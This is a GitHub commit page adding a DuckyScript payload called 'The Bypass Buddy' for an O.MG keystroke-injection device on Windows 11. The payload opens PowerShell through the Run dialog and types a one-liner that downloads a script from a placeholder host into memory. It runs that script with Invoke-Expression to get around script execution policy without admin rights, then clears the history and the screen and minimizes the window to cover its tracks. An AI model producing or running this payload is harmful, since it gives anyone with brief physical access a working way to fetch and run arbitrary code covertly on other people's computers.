Create bypass-buddy.txt

In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections.  The approach involves downloading a script to RAM, then executing it in RAM on-the-fly.  This can be accomplished **without** administrative rights.
pull/237/head
salt-or-ester 2024-09-13 12:29:59 -07:00 committed by GitHub
parent f4d54cfebe
commit dd72e4b9cc
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
REM_BLOCK
The Bypass Buddy
by salt-or-ester - salt-or-ester@protonmail.com
Tested on: O.MG Plug Elite, Windows 11
Will likely work on other devices and Windows flavors
The Bypass Buddy implements a method to evade Windows script execution
policy protections.
The approach involves downloading a Powershell script into memory (not disk),
and running it on-the-fly.
This can be accomplished without administrative rights.
END_REM
REM Payload to download and run in memory
DEFINE #PAYLOAD_URL "http://10.10.10.10/payload.ps1"
FUNCTION EVADE_SCRIPT_EXECUTION_POLICY()
GUI r
DELAY 2000 REM Let GUI load
STRINGLN powershell
DELAY 1000 REM Let Powershell window open
STRINGLN Start-Job -ScriptBlock { try { $response = Invoke-WebRequest -Uri #PAYLOAD_URL -ErrorAction Stop; $scriptContent = [System.Text.Encoding]::UTF8.GetString($response.Content); cd ~; Invoke-Expression $scriptContent } catch { Write-Error "Failed to download or execute script: $_" } }
STRINGLN Clear-History
STRINGLN clear
GUI DOWNARROW
END_FUNCTION
DELAY 3000 REM Wait for device to be "ready"
EVADE_SCRIPT_EXECUTION_POLICY()